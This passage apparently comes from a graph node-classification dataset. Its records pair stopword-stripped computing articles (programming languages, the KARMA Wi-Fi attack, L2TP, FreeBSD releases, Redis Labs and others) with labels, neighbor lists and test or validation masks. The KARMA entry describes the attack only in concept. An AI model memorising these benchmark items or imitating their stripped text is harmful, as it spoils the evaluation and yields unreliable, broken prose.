programming language many programming languages designed scratch altered meet new needs combined languages many eventually fallen disuse although attempts design one universal programming language serves purposes failed generally accepted filling role need diverse programming languages arises diversity contexts languages used one common trend development programming languages add ability solve problems using higher level abstraction earliest programming languages tied closely underlying hardware computer new programming languages developed features added let programmers express ideas remote simple translation underlying hardware instructions programmers less tied complexity computer programs computing less effort programmer lets write functionality per time unit natural language programming proposed way eliminate need specialized language programming however goal remains distant benefits open debate edsger w. dijkstra took position use formal language essential prevent introduction meaningless constructs dismissed natural language programming foolish alan perlis similarly dismissive idea hybrid approaches taken structured english sql language designers users must construct number artifacts govern enable practice programming important artifacts language specification implementation specification programming language artifact language users implementors use agree upon whether piece source code valid program language behavior shall programming language specification take several forms including following implementation programming language provides way write programs language execute one configurations hardware software broadly two approaches programming language implementation compilation interpretation generally possible implement language using either technique output compiler may executed hardware program called interpreter implementations make use interpreter approach distinct boundary compiling interpreting instance implementations basic compile execute source line time programs executed directly hardware usually run much faster interpreted software one technique improving performance interpreted programs just-in-time compilation virtual machine execution translates blocks bytecode going used machine code direct execution hardware although commonly used programming languages fully open specifications implementations many programming languages exist proprietary programming languages implementation available single vendor may claim proprietary language intellectual property proprietary programming languages commonly domain specific languages internal scripting languages single product proprietary languages used internally within vendor others available external users programming languages exist border proprietary open example oracle corporation asserts proprietary rights aspects java programming language microsoft c programming language open implementations parts system also common language runtime clr closed environment many proprietary languages widely used spite proprietary nature examples include matlab vbscript wolfram language languages may make transition closed open example erlang originally ericsson internal programming language thousands different programming languages created mainly computing field software commonly built 5 programming languages programming languages differ forms human expression require greater degree precision completeness using natural language communicate people human authors speakers ambiguous make small errors still expect intent understood however figuratively speaking computers exactly told understand code programmer intended write combination language definition program program inputs must fully specify external behavior occurs program executed within domain control program hand ideas algorithm communicated humans without precision required execution using pseudocode interleaves natural language code written programming language programming language provides structured mechanism defining pieces data operations transformations may carried automatically data programmer uses abstractions present language represent concepts involved computation concepts represented collection simplest elements available called primitives programming process programmers combine primitives compose new programs adapt existing ones new uses changing environment programs computer might executed batch process without human interaction user might type commands interactive session interpreter case commands simply programs whose execution chained together language run commands interpreter unix shell command-line interface without compiling called scripting language determining widely used programming language difficult since definition usage varies context one language may occupy greater number programmer hours different one lines code third may consume cpu time languages popular particular kinds applications example cobol still strong corporate data center often large mainframes fortran scientific engineering applications ada aerospace transportation military real-time embedded applications c embedded applications operating systems languages regularly used write many different kinds applications various methods measuring language popularity subject different bias measured proposed combining averaging information various internet sites stackify.com reported ten popular programming languages descending order overall popularity java c c++ python c javascript vb .net r php matlab dialect programming language data exchange language relatively small variation extension language change intrinsic nature languages scheme forth standards may considered insufficient inadequate illegitimate implementors often deviate standard making new dialect cases dialect created use domain-specific language often subset lisp world languages use basic s-expression syntax lisp-like semantics considered lisp dialects although vary wildly say racket clojure common one language several dialects become quite difficult inexperienced programmer find right documentation basic programming language many dialects explosion forth dialects led saying 've seen one forth ... 've seen one forth overarching classification scheme programming languages given programming language usually single ancestor language languages commonly arise combining elements several predecessor languages new ideas circulation time ideas originate one language diffuse throughout family related languages leap suddenly across familial gaps appear entirely different family task complicated fact languages classified along multiple axes example java object-oriented language encourages object-oriented organization concurrent language contains built-in constructs running multiple threads parallel python object-oriented scripting language broad strokes programming languages divide programming paradigms classification intended domain use general-purpose programming languages distinguished domain-specific programming languages traditionally programming languages regarded describing computation terms imperative sentences i.e issuing commands generally called imperative programming languages great deal research programming languages aimed blurring distinction program set instructions program assertion desired answer main feature declarative programming refined paradigms include procedural programming object-oriented programming functional programming logic programming languages hybrids paradigms multi-paradigmatic assembly language much paradigm direct model underlying machine architecture purpose programming languages might considered general purpose system programming languages scripting languages domain-specific languages concurrent/distributed languages combination general purpose languages designed largely educational goals programming language may also classified factors unrelated programming paradigm instance programming languages use english language keywords minority languages may classified deliberately esoteric",
    "neighbors": [
      6147,
      6148,
      10246,
      10251,
      2062,
      15,
      6160,
      6161,
      2066,
      6163,
      10261,
      4121,
      4122,
      8219,
      8221,
      6176,
      8225,
      8226,
      10273,
      4134,
      4136,
      8244,
      2102,
      2103,
      4151,
      2105,
      58,
      60,
      8252,
      8258,
      6212,
      69,
      2117,
      2120,
      6218,
      2132,
      6228,
      8278,
      10324,
      8280,
      2137,
      92,
      8285,
      10335,
      6240,
      6242,
      8293,
      2152,
      4201,
      6248,
      6249,
      10345,
      4205,
      8301,
      8303,
      10347,
      2168,
      2177,
      8323,
      132,
      8324,
      8326,
      2183,
      136,
      4236,
      10387,
      10388,
      10393,
      154,
      155,
      2204,
      6299,
      10395,
      6304,
      10400,
      2216,
      6313,
      10413,
      2225,
      4277,
      6332,
      8382,
      191,
      10430,
      10435,
      196,
      8388,
      4302,
      10455,
      217,
      219,
      220,
      8411,
      8413,
      10463,
      2272,
      4321,
      228,
      8421,
      10469,
      10470,
      10472,
      2281,
      2283,
      10475,
      8429,
      8430,
      10478,
      8435,
      4341,
      2294,
      2297,
      8445,
      2303,
      2304,
      8447,
      4354,
      10499,
      261,
      6406,
      8453,
      8454,
      267,
      2316,
      6414,
      8463,
      10510,
      273,
      10512,
      6420,
      6422,
      280,
      8474,
      10525,
      2335,
      288,
      8479,
      292,
      6437,
      294,
      8486,
      4392,
      10537,
      4398,
      303,
      6448,
      305,
      8494,
      8495,
      10547,
      8502,
      8503,
      2361,
      4409,
      4410,
      10555,
      10559,
      10560,
      321,
      2374,
      10568,
      329,
      10569,
      332,
      2380,
      8524,
      338,
      10581,
      2390,
      10586,
      10590,
      2401,
      8549,
      6502,
      6503,
      8554,
      369,
      4466,
      10618,
      380,
      4476,
      4483,
      4486,
      8582,
      6536,
      394,
      4492,
      4493,
      8588,
      10638,
      10645,
      2457,
      10649,
      6556,
      6558,
      8606,
      8609,
      4516,
      2469,
      4519,
      428,
      10668,
      6574,
      10672,
      2482,
      8626,
      8627,
      8628,
      10680,
      443,
      10684,
      6594,
      2499,
      4548,
      6596,
      4550,
      8644,
      8647,
      465,
      470,
      2519,
      4571,
      4572,
      477,
      10716,
      479,
      4576,
      482,
      4578,
      8675,
      6629,
      486,
      6631,
      8680,
      10730,
      10732,
      4590,
      502,
      505,
      8697,
      6652,
      2558,
      511,
      512,
      4608,
      10750,
      515,
      516,
      10752,
      4614,
      522,
      10762,
      8719,
      8722,
      4627,
      532,
      8728,
      2585,
      545,
      8738,
      547,
      2595,
      10786,
      6694,
      2599,
      2605,
      2608,
      4656,
      564,
      566,
      2617,
      4667,
      572,
      2620,
      4669,
      6717,
      6718,
      2626,
      4674,
      8771,
      8773,
      8774,
      8775,
      10819,
      4684,
      2637,
      4685,
      2644,
      6742,
      2647,
      2650,
      10848,
      6753,
      2658,
      10851,
      2660,
      10854,
      2666,
      2667,
      2670,
      623,
      4720,
      6767,
      10866,
      6772,
      8821,
      2680,
      6778,
      8831,
      2691,
      10883,
      6791,
      655,
      6802,
      8853,
      10909,
      671,
      673,
      4770,
      6818,
      2725,
      4774,
      8870,
      4777,
      6826,
      10921,
      8879,
      10927,
      692,
      6837,
      6840,
      10939,
      2754,
      10946,
      4808,
      10953,
      8907,
      8908,
      721,
      8915,
      4822,
      731,
      8926,
      736,
      4835,
      4838,
      4839,
      4840,
      10983,
      4844,
      8940,
      2798,
      10991,
      10994,
      2804,
      2808,
      6906,
      2813,
      8958,
      4865,
      11010,
      4867,
      8964,
      6919,
      2828,
      8973,
      11023,
      8976,
      6933,
      6934,
      791,
      11032,
      798,
      8990,
      8991,
      2849,
      2852,
      805,
      9002,
      2862,
      4912,
      9008,
      823,
      6967,
      825,
      2875,
      4930,
      6979,
      837,
      11079,
      840,
      11082,
      11083,
      847,
      11090,
      852,
      2901,
      2903,
      9047,
      9050,
      4955,
      11102,
      7009,
      868,
      4964,
      4968,
      9064,
      11112,
      7020,
      2925,
      7022,
      2929,
      7026,
      7027,
      4980,
      11125,
      2936,
      11132,
      4995,
      4998,
      7055,
      9103,
      915,
      7061,
      2966,
      11160,
      7067,
      7069,
      2978,
      7076,
      5031,
      937,
      9133,
      5040,
      9139,
      5048,
      955,
      9151,
      963,
      5059,
      11204,
      9162,
      5067,
      3022,
      9166,
      11218,
      11219,
      5079,
      5081,
      3034,
      987,
      11227,
      11228,
      993,
      7144,
      3049,
      5097,
      3051,
      5100,
      7147,
      7148,
      9192,
      9194,
      11240,
      11252,
      11253,
      7158,
      1016,
      9210,
      11258,
      11265,
      11267,
      7172,
      11269,
      9224,
      5129,
      3082,
      11279,
      7184,
      7189,
      7193,
      5148,
      9244,
      3102,
      9245,
      11294,
      11295,
      5154,
      7205,
      1067,
      5168,
      9272,
      3132,
      11326,
      11327,
      7237,
      3144,
      7241,
      1099,
      9291,
      9294,
      9295,
      5204,
      3159,
      1112,
      3160,
      9304,
      7259,
      7262,
      5219,
      5220,
      7267,
      1126,
      5222,
      9315,
      11363,
      1130,
      1131,
      3178,
      5228,
      3182,
      7274,
      1136,
      9330,
      9331,
      11383,
      3193,
      1147,
      1148,
      7292,
      7293,
      11391,
      9345,
      5253,
      1159,
      7308,
      5262,
      11411,
      11412,
      3221,
      9366,
      7319,
      9370,
      7326,
      11422,
      3233,
      9385,
      7343,
      3248,
      11442,
      1203,
      7347,
      7355,
      1213,
      1215,
      7363,
      1221,
      3277,
      1234,
      3286,
      7386,
      9434,
      7392,
      11488,
      7394,
      7395,
      11490,
      1253,
      11494,
      1255,
      5354,
      7405,
      5358,
      9454,
      5360,
      5361,
      11501,
      1277,
      1278,
      5373,
      5374,
      7421,
      1282,
      5380,
      7428,
      3334,
      3336,
      9482,
      7438,
      5395,
      1301,
      11541,
      5399,
      1304,
      9497,
      5403,
      1308,
      5406,
      7455,
      5409,
      11555,
      5415,
      5418,
      7466,
      3374,
      9519,
      5428,
      1333,
      5429,
      5431,
      7479,
      11574,
      11576,
      1343,
      9535,
      1349,
      7494,
      3402,
      11596,
      1358,
      5456,
      3409,
      7504,
      1365,
      9557,
      7513,
      5466,
      5467,
      11610,
      1375,
      9573,
      9575,
      1384,
      11625,
      9578,
      1388,
      11628,
      3442,
      9587,
      5492,
      3446,
      5494,
      3448,
      5496,
      9590,
      7547,
      7548,
      9596,
      1407,
      5506,
      3462,
      7558,
      7562,
      9610,
      3468,
      1422,
      5519,
      5521,
      5522,
      1427,
      3475,
      9619,
      9622,
      11665,
      5530,
      1435,
      7580,
      9626,
      9631,
      11679,
      1442,
      11683,
      11689,
      5546,
      7595,
      11692,
      1455,
      5551,
      7609,
      5564,
      7612,
      7616,
      5569,
      1474,
      3524,
      1480,
      3529,
      7627,
      5582,
      7630,
      1488,
      5584,
      1490,
      5585,
      5588,
      3554,
      5603,
      1516,
      5612,
      5613,
      7662,
      9710,
      9714,
      5620,
      3573,
      7670,
      5623,
      3577,
      1535,
      9730,
      3587,
      5635,
      5637,
      5638,
      9735,
      7689,
      3594,
      7691,
      1552,
      3600,
      3601,
      5651,
      7700,
      7701,
      9749,
      9751,
      9752,
      7707,
      1565,
      3613,
      9759,
      1568,
      1572,
      3624,
      1578,
      5676,
      5677,
      5678,
      5679,
      5680,
      9776,
      5684,
      7732,
      9780,
      1591,
      9784,
      1594,
      5695,
      3650,
      9794,
      7749,
      5703,
      1610,
      1611,
      9804,
      1613,
      3664,
      3665,
      5714,
      7766,
      5719,
      9820,
      7774,
      7775,
      5729,
      7787,
      9835,
      5741,
      9839,
      3698,
      5747,
      9845,
      3705,
      5754,
      7803,
      3708,
      7805,
      9859,
      3716,
      7812,
      1670,
      3718,
      1672,
      3722,
      5775,
      9871,
      9875,
      1685,
      5783,
      3736,
      9881,
      7835,
      9889,
      1698,
      3747,
      9891,
      5800,
      5803,
      9903,
      3762,
      9907,
      3771,
      1724,
      7867,
      5826,
      7876,
      9926,
      5833,
      9931,
      9932,
      7889,
      5845,
      5852,
      9949,
      7904,
      9960,
      1769,
      1780,
      3830,
      9975,
      5880,
      9977,
      7931,
      1790,
      5888,
      5892,
      1799,
      5896,
      7945,
      1804,
      7950,
      1808,
      5909,
      5911,
      10008,
      3865,
      10009,
      10011,
      3869,
      5917,
      3871,
      5920,
      5921,
      1826,
      7971,
      3876,
      10013,
      1830,
      5926,
      7977,
      10026,
      7981,
      10030,
      7983,
      5938,
      5946,
      5947,
      3900,
      1853,
      3901,
      10043,
      3904,
      10044,
      10045,
      10047,
      10049,
      3910,
      1864,
      8011,
      5968,
      10065,
      3923,
      8019,
      10068,
      1883,
      1887,
      10080,
      1890,
      10083,
      3940,
      5989,
      5993,
      8043,
      5997,
      10098,
      6007,
      3960,
      6008,
      8057,
      8059,
      8063,
      6016,
      1923,
      8069,
      1931,
      3980,
      1935,
      1936,
      6032,
      8079,
      8080,
      6036,
      8082,
      10129,
      6039,
      8088,
      8092,
      3999,
      1952,
      6047,
      6049,
      10143,
      1956,
      8101,
      10145,
      6056,
      6057,
      1963,
      6060,
      6061,
      8108,
      10155,
      10159,
      1971,
      1976,
      6074,
      6075,
      8122,
      4029,
      10177,
      4035,
      10179,
      4042,
      8140,
      1999,
      8143,
      2001,
      10191,
      6100,
      10198,
      6104,
      4057,
      2011,
      2013,
      8158,
      6112,
      4069,
      8171,
      2028,
      2035,
      6137,
      8188,
      2045,
      10239
    ],
    "mask": "None"
  },
  {
    "node_id": 8263,
    "label": 2,
    "text": "Donna_Benjamin:donna benjamin donna benjamin australian open source community contributor commentator advocate served board positions community organisations including open source industry australia drupal association ada initiative lead organiser 2008 linux.conf.au conference melbourne regularly runs community leadership summit x lca clsxlca workshop focussing community development open source projects 2011 organised crowdfunding campaign called digitise dawn successfully raised funds digitise dawn early feminist journal published australia 1888 1905 2012 received rusty wrench award linux australia recognition contributions runs micro-business called creative contingencies specialises drupal content management platform",
    "neighbors": [
      1026,
      5644,
      4367,
      8848,
      657,
      10642,
      1939,
      2581,
      3478,
      6808,
      7450,
      6302,
      7584,
      802,
      5410,
      6691,
      6947,
      8354,
      5931,
      8364,
      1717,
      823,
      2109,
      11069,
      10687,
      10822,
      843,
      589,
      6352,
      4177,
      11602,
      8787,
      4437,
      6489,
      3802,
      4831,
      9696,
      11232,
      7793,
      1394,
      1396,
      3189,
      11643
    ],
    "mask": "Test"
  },
  {
    "node_id": 8264,
    "label": 4,
    "text": "KARMA_attack:karma attack information security karma attack exploits behaviour wi-fi devices combined lack access point authentication numerous wifi protocols variant evil twin attack details attack first published 2004 dino dai zovi shaun macaulay vulnerable client devices broadcast preferred network list pnl contains ssids access points previously connected willing automatically reconnect without user intervention broadcasts encrypted hence may received wifi access point range karma attack consists access point receiving list giving ssid pnl thus becoming evil twin access point already trusted client done client receives malicious access point signal strongly genuine access point example genuine access point nowhere nearby client attempt authenticate access point attack succeed attack succeeds malicious access point becomes man middle mitm positions deploy attacks victim device distinguishes karma plain evil twin attack use pnl allows attacker know rather simply guess ssids client automatically attempt connect",
    "neighbors": [
      9640,
      2734,
      9968,
      5373,
      4863
    ],
    "mask": "None"
  },
  {
    "node_id": 8265,
    "label": 5,
    "text": "Layer_2_Tunneling_Protocol:layer 2 tunneling protocol computer networking layer 2 tunneling protocol l2tp tunneling protocol used support virtual private networks vpns part delivery services isps provide encryption confidentiality rather relies encryption protocol passes within tunnel provide privacy published 2000 proposed standard rfc 2661 l2tp origins primarily two older tunneling protocols point-to-point communication cisco layer 2 forwarding protocol l2f microsoft's point-to-point tunneling protocol pptp new version protocol l2tpv3 appeared proposed standard rfc 3931 2005 l2tpv3 provides additional security features improved encapsulation ability carry data links simply point-to-point protocol ppp ip network example frame relay ethernet atm etc. entire l2tp packet including payload l2tp header sent within user datagram protocol udp datagram virtue transmission udp rather tcp c.f sstp avoids tcp meltdown problem common carry ppp sessions within l2tp tunnel l2tp provide confidentiality strong authentication ipsec often used secure l2tp packets providing confidentiality authentication integrity combination two protocols generally known l2tp/ipsec discussed two endpoints l2tp tunnel called lac l2tp access concentrator lns l2tp network server lns waits new tunnels tunnel established network traffic peers bidirectional useful networking higher-level protocols run l2tp tunnel facilitate l2tp session 'call established within tunnel higher-level protocol ppp either lac lns may initiate sessions traffic session isolated l2tp possible set multiple virtual networks across single tunnel mtu considered implementing l2tp packets exchanged within l2tp tunnel categorized either control packets data packets l2tp provides reliability features control packets reliability data packets reliability desired must provided nested protocols running within session l2tp tunnel l2tp allows creation virtual private dialup network vpdn connect remote client corporate network using shared infrastructure could internet service provider network l2tp tunnel extend across entire ppp session across one segment two-segment session represented four different tunneling models namely l2tp packet consists field meanings time setup l2tp connection many control packets exchanged server client establish tunnel session direction one peer requests peer assign specific tunnel session id control packets using tunnel session id data packets exchanged compressed ppp frames payload list l2tp control messages exchanged lac lns handshaking establishing tunnel session voluntary tunneling method lack confidentiality inherent l2tp protocol often implemented along ipsec referred l2tp/ipsec standardized ietf rfc 3193 process setting l2tp/ipsec vpn follows process complete l2tp packets endpoints encapsulated ipsec since l2tp packet wrapped hidden within ipsec packet original source destination ip address encrypted within packet also necessary open udp port 1701 firewalls endpoints since inner packets acted upon ipsec data decrypted stripped takes place endpoints potential point confusion l2tp/ipsec use terms tunnel secure channel term tunnel-mode refers channel allows untouched packets one network transported another network case l2tp/ppp allows l2tp/ppp packets transported ip secure channel refers connection within confidentiality data guaranteed l2tp/ipsec first ipsec provides secure channel l2tp provides tunnel windows native support configurable control panel l2tp since windows 2000 windows vista added 2 alternative tools mmc snap-in called windows firewall advanced security wfwas netsh advfirewall command-line tool one limitation wfwas netsh commands servers must specified ip address windows 10 added add-vpnconnection set-vpnconnectionipsecconfiguration powershell commands registry key must created client server server behind nat-t device l2tp often used isps internet service example adsl cable resold end user packets travel wholesale network service provider network server called broadband remote access server bras protocol converter router combined legacy networks path end user customer premises equipment bras may atm network ip network l2tp tunnel runs bras acting lac lns edge router boundary ultimate destination isp ip network see example reseller isps using l2tp",
    "neighbors": [
      10242,
      1030,
      8211,
      6681,
      6682,
      10271,
      6689,
      9251,
      9764,
      2085,
      7208,
      3629,
      7214,
      8238,
      562,
      1586,
      9269,
      11321,
      3133,
      5181,
      6723,
      11332,
      4687,
      1618,
      2136,
      10341,
      9318,
      10344,
      3695,
      4723,
      5749,
      2679,
      4729,
      6779,
      5251,
      9860,
      5254,
      649,
      10889,
      9868,
      3218,
      9365,
      11413,
      152,
      2206,
      3742,
      9380,
      9381,
      3751,
      3752,
      172,
      4268,
      6318,
      7855,
      10924,
      10417,
      7859,
      2228,
      9909,
      4793,
      7865,
      4797,
      702,
      3777,
      7364,
      8391,
      8905,
      11468,
      1229,
      7376,
      5843,
      732,
      6364,
      10461,
      7391,
      3297,
      2797,
      751,
      8432,
      8946,
      5875,
      3322,
      9987,
      3847,
      1297,
      10005,
      5402,
      5405,
      9511,
      7984,
      10035,
      8504,
      2362,
      10748,
      829,
      5437,
      2884,
      2373,
      2887,
      5959,
      10058,
      849,
      6993,
      1876,
      11606,
      2904,
      9048,
      6490,
      7003,
      5469,
      5470,
      5471,
      5472,
      10589,
      1893,
      871,
      8039,
      361,
      11112,
      367,
      9593,
      891,
      6524,
      2431,
      11647,
      10115,
      6541,
      7570,
      11162,
      5531,
      10144,
      10659,
      933,
      2983,
      6577,
      2996,
      10171,
      3006,
      9670,
      2509,
      5084,
      8669,
      8670,
      10210,
      10723,
      10727,
      3564,
      11248,
      9722,
      6651,
      3580,
      5118,
      4095
    ],
    "mask": "None"
  },
  {
    "node_id": 8266,
    "label": 2,
    "text": "FreeBSD_version_history:freebsd version history released november 1993 1.1.5.1 released july 1994 2.0-release announced 22 november 1994 final release freebsd 2 2.2.8-release announced 29 november 1998 freebsd 2.0 first version freebsd claimed legally free unix code approval novell first version widely used beginnings spread internet servers 2.2.9-release released april 1 2006 fully functional april fools day prank seventy-seven months tireless work freebsd developers users children pets freebsd 3.0-release announced 16 october 1998 final release 3.5-release announced 24 june 2000 freebsd 3.0 first branch able support symmetric multiprocessing smp systems using giant lock marked transition a.out elf executables usb support first introduced freebsd 3.1 first gigabit network cards supported 3.2-release 4.0-release appeared march 2000 last 4-stable branch release 4.11 january 2005 supported 31 january 2007 freebsd 4 lauded stability favorite operating system isps web hosting providers first dot-com bubble widely regarded one stable high performance operating systems whole unix lineage among new features freebsd 4 codice_1 introduced part major bsd systems jails way running processes separate environments version 4.8 forked matt dillon create dragonfly bsd almost three years development first 5.0-release january 2003 widely anticipated featuring support advanced multiprocessor application threading ultrasparc ia-64 platforms first 5-stable release 5.3 5.0 5.2.1 cut -current last release 5-stable branch 5.5 may 2006 largest architectural development freebsd 5 major change low-level kernel locking mechanisms enable better symmetric multi-processor smp support released much kernel mp lock sometimes called giant lock one process could execute kernel mode time major changes included n native threading implementation called kernel scheduled entities kse principle similar scheduler activations starting freebsd 5.3 kse default threading implementation replaced 1:1 implementation freebsd 7.0 freebsd 5 also significantly changed block i/o layer implementing geom modular disk i/o request transformation framework contributed poul-henning kamp geom enables simple creation many kinds functionality mirroring gmirror encryption gbde geli work supported sponsorship darpa early versions 5.x much developer previews pronounced instability 5.4 5.5 releases freebsd confirmed technologies introduced freebsd 5.x branch future highly stable high-performing releases freebsd 6.0 released 4 november 2005 final freebsd 6 release 6.4 11 november 2008 versions extended work smp threading optimization along work advanced 802.11 functionality trustedbsd security event auditing significant network stack performance enhancements fully preemptive kernel support hardware performance counters hwpmc main accomplishments releases include removal giant lock vfs implementation better-performing optional libthr library 1:1 threading addition basic security module bsm audit implementation called openbsm created trustedbsd project based bsm implementation found apple open source darwin released bsd-style license freebsd 7.0 released 27 february 2008 final freebsd 7 release 7.4 24 february 2011 new features included sctp ufs journaling experimental port sun zfs file system gcc4 improved support arm architecture jemalloc memory allocator optimized parallel computation ported firefox 3 major updates optimizations relating network audio smp performance benchmarks showed significant performance improvements compared previous freebsd releases well linux new ule scheduler much improved decision made ship 7.0 release older 4bsd scheduler leaving ule kernel compile-time tunable freebsd 7.1 ule default i386 amd64 architectures dtrace support integrated version 7.1 netbsd freebsd 7.2 brought support multi-ipv4/ipv6 jails code supporting dec alpha architecture supported since freebsd 4.0 removed freebsd 7.0 freebsd 8.0 officially released 25 november 2009 freebsd 8 branched trunk august 2009 features superpages xen domu support network stack virtualization stack-smashing protection tty layer rewrite much updated improved zfs support new usb stack usb 3.0 xhci support added freebsd 8.2 multicast updates including igmpv3 rewritten nfs client/server introducing nfsv4 aes acceleration supported intel cpus added freebsd 8.2 inclusion improved device mmap extensions enables implementation 64-bit nvidia display driver x86-64 platform pluggable congestion control framework support ability use dtrace applications running linux emulation added freebsd 8.3 freebsd 8.4 released 7 june 2013 final release freebsd 8 series freebsd 9.0 released 12 january 2012 key features release include new installer bsdinstall ufs journaling zfs version 28 userland dtrace nfsv4-compatible nfs server client usb 3.0 support support running playstation 3 capsicum sandboxing llvm 3.0 base system kernel base system could built clang freebsd 9.0 still used gcc4.2 default playstation 4 video game console uses derived version freebsd 9.0 sony computer entertainment dubbed orbis os freebsd 9.1 released 31 december 2012 freebsd 9.2 released 30 september 2013 freebsd 9.3 released 16 july 2014 20 january 2014 freebsd release engineering team announced availability freebsd 10.0-release key features include deprecation gcc favor clang new iscsi implementation virtio drivers out-of-the-box kvm support fuse implementation freebsd 10.1-release announced 14 november 2014 supported extended term 31 december 2016 subsequent 10.2-release reached eol day october 2017 10.4-release final release branch announced support 10 series terminated october 2018 10 october 2016 freebsd release engineering team announced availability freebsd 11.0-release freebsd 12.0-release announced december 2018 following table presents version release history freebsd operating system timeline shows span single release generation freebsd lasts around 5 years since freebsd project makes effort binary backward limited forward compatibility within release generation allows users 5+ years support trivial-to-easy upgrading within release generation",
    "neighbors": [
      10761,
      533,
      2584,
      4636,
      1071,
      9784,
      5177,
      3142,
      5710,
      7249,
      7252,
      9306,
      10332,
      2143,
      607,
      7270,
      9320,
      8816,
      9844,
      9335,
      633,
      9343,
      2180,
      3218,
      5270,
      3742,
      9374,
      2212,
      684,
      10924,
      3248,
      1718,
      7863,
      5819,
      11459,
      9927,
      8395,
      8909,
      6864,
      10455,
      6361,
      8410,
      8937,
      5356,
      9964,
      11506,
      2804,
      8439,
      6904,
      1273,
      7425,
      8962,
      1801,
      274,
      5402,
      4902,
      6438,
      10535,
      4908,
      9009,
      11573,
      1849,
      6464,
      9541,
      850,
      2904,
      6491,
      2397,
      5469,
      5470,
      10079,
      7521,
      1891,
      3431,
      11112,
      2409,
      11631,
      7027,
      5492,
      2421,
      11636,
      2424,
      376,
      8582,
      1927,
      10631,
      7570,
      3990,
      9625,
      1946,
      6062,
      11698,
      9655,
      1465,
      3006,
      8126,
      9665,
      1990,
      2509,
      7134,
      3551,
      998,
      4073,
      11246,
      2545,
      3058,
      5106,
      9201,
      8700,
      3071
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8267,
    "label": 4,
    "text": "AlgoSec:algosec algosec provider software network security policy management also known firewall policy management algosec products automate management enforcement security policies across firewalls routers virtual private networks vpns related security devices enterprises use algosec products manage configuration security systems identify vulnerabilities test systems security policies reduce administrative costs ensure compliance regulations pci-dss sarbanes-oxley algosec delivers products standalone modules well via integrated suite algosec security management suite includes integration products suite provides two-way link two processes products available software loaded appliance algosec ’ core technology developed 2001 prof. avishai wool team researchers bell laboratories prof wool teamed yuval baron found algosec 2004 time company headquartered reston virginia 2010 algosec moved headquarters north american sales office roswell georgia atlanta area 2012 algosec moved headquarters ridgefield park new jersey today addition boston office algosec sales offices london singapore research development center petah tikva israel london algosec customers include enterprises managed service providers auditors consultants throughout world",
    "neighbors": [
      939,
      8998,
      4119
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8268,
    "label": 3,
    "text": "ΜClinux:μclinux μclinux variation linux kernel previously maintained fork targets microcontrollers without memory management unit mmu integrated mainline development 2.5.46 project continues develop patches tools microcontrollers homepage lists linux kernel releases 2.0 2.4 2.6 end-of-life mainline letters μc microcontroller name pronounced you-see-linux rather pronouncing letter mu greek μclinux originally created d. jeff dionne kenneth albanowski 1998 initially targeted motorola dragonball family embedded 68k processors specifically 68ez328 series used motorola palmpilot 2.0.33 linux kernel releasing initial work developer community quickly sprang extending work newer kernels microprocessor architectures early 1999 support added motorola freescale coldfire family embedded microprocessors arm processor support added later although originally targeting 2.0 series linux kernels ports based linux 2.4 linux 2.6 linux 2.4 ports forward ported 2.0.36 linux kernel michael leslie evan stawnyczy work rt-control never μclinux extensions applied 2.2 series kernels since version 2.5.46 linux kernel major parts μclinux integrated mainline kernel number processor architectures greg ungerer originally ported μclinux motorola coldfire family processors continues maintain actively push core μclinux support 2.6 series linux kernels regard μclinux essentially longer separate fork linux project continues develop patches supporting tools using linux microcontrollers μclinux support many architectures forms basis many products like network routers security cameras dvd mp3 players voip phone gateways scanners card readers current list includes",
    "neighbors": [
      516,
      4616,
      3082,
      5139,
      10780,
      10785,
      3618,
      6180,
      10791,
      8242,
      9266,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      6244,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      7820,
      7821,
      4238,
      10382,
      1170,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      8355,
      4773,
      8364,
      10933,
      5815,
      11447,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      7403,
      9964,
      10482,
      5363,
      2294,
      8439,
      2809,
      4360,
      1291,
      4367,
      1298,
      792,
      10016,
      295,
      823,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      11603,
      5975,
      11095,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      3467,
      4493,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      9137,
      1972,
      1462,
      9667,
      457,
      3017,
      9685,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 8269,
    "label": 7,
    "text": "Redis_Labs:redis labs redis labs originally garantia data private computer software company based mountain view california provides database management system marketed nosql open source software service using cloud computing company additional offices london tel aviv redis labs founded 2011 ofer bengal previously founder ceo rit technologies yiftach shoolman previously founder president crescendo networks acquired f5 networks july 15 2015 creator redis lead developer salvatore sanfilippo joined redis labs lead open source development redis labs became official sponsor open source project company secured 4 million seed funding angel investors august 2012 additional 9 million series funding led bain capital ventures carmel ventures additional 15m series b funding led existing investors silicon valley bank additional 14 million series c funding led investors august 2017 raised 44 million series funding february 2019 60 million series e funding led francisco partners participation existing investors company announced beta version cloud services gigaom ’ structure launchpad june 2012 according business edge redis enterprise cloud especially suitable “ web companies websites seasonal occasional fluctuations traffic performance needs january 2013 company 1,000 paying customers including electronic arts illumina scopely redis enterprise cloud memcached cloud products became generally available february 2013 late 2013 redis labs announced focus mainly cloud-based redis offering although continue support memcached product september 2013 amazon web services announced redis capabilities elasticache product thereby competing company offering according techcrunch redis labs advantage aws comes redis scalability high availability features elasticache provide october 2013 redis labs acquired myredis competing hosted redis provider december 2013 company least 10,000 users including 1,300 paying customers january 29 2014 company changed name garantia data redis labs september 2014 redis labs reported 3,000 paying customers including bleacher report hoteltonight docker early 2015 redis labs made available redis enterprise pack formerly known redis labs enterprise cluster rlec downloadable software installation enterprise-grade clusters acts container managing running multiple redis databases early 2016 redis labs made available connector package apache spark may 2016 company announced mechanism developers extend redis opened online marketplace offers modules certified work open source redis redis labs ’ enterprise products redis labs provides downloadable software known redis enterprise software redis enterprise vpc cloud computing service known redis enterprise cloud products address two primary challenges faced redis users redis scalable beyond single node limited reliability high availability capabilities redis enterprise software redis enterprise vpc redis enterprise cloud solve problems provide following additional functionalities regular redis installation redis modules expansion redis key-value store multi-model database using custom made data-types introduced salvatore sanfilippo order prevent scope creep core redis redis modules redis source available license current modules include redis enterprise achieve scalability high availability using proprietary dynamic clustering engine services virtualize multiple cloud servers large pool memory consumed users according actual size datasets 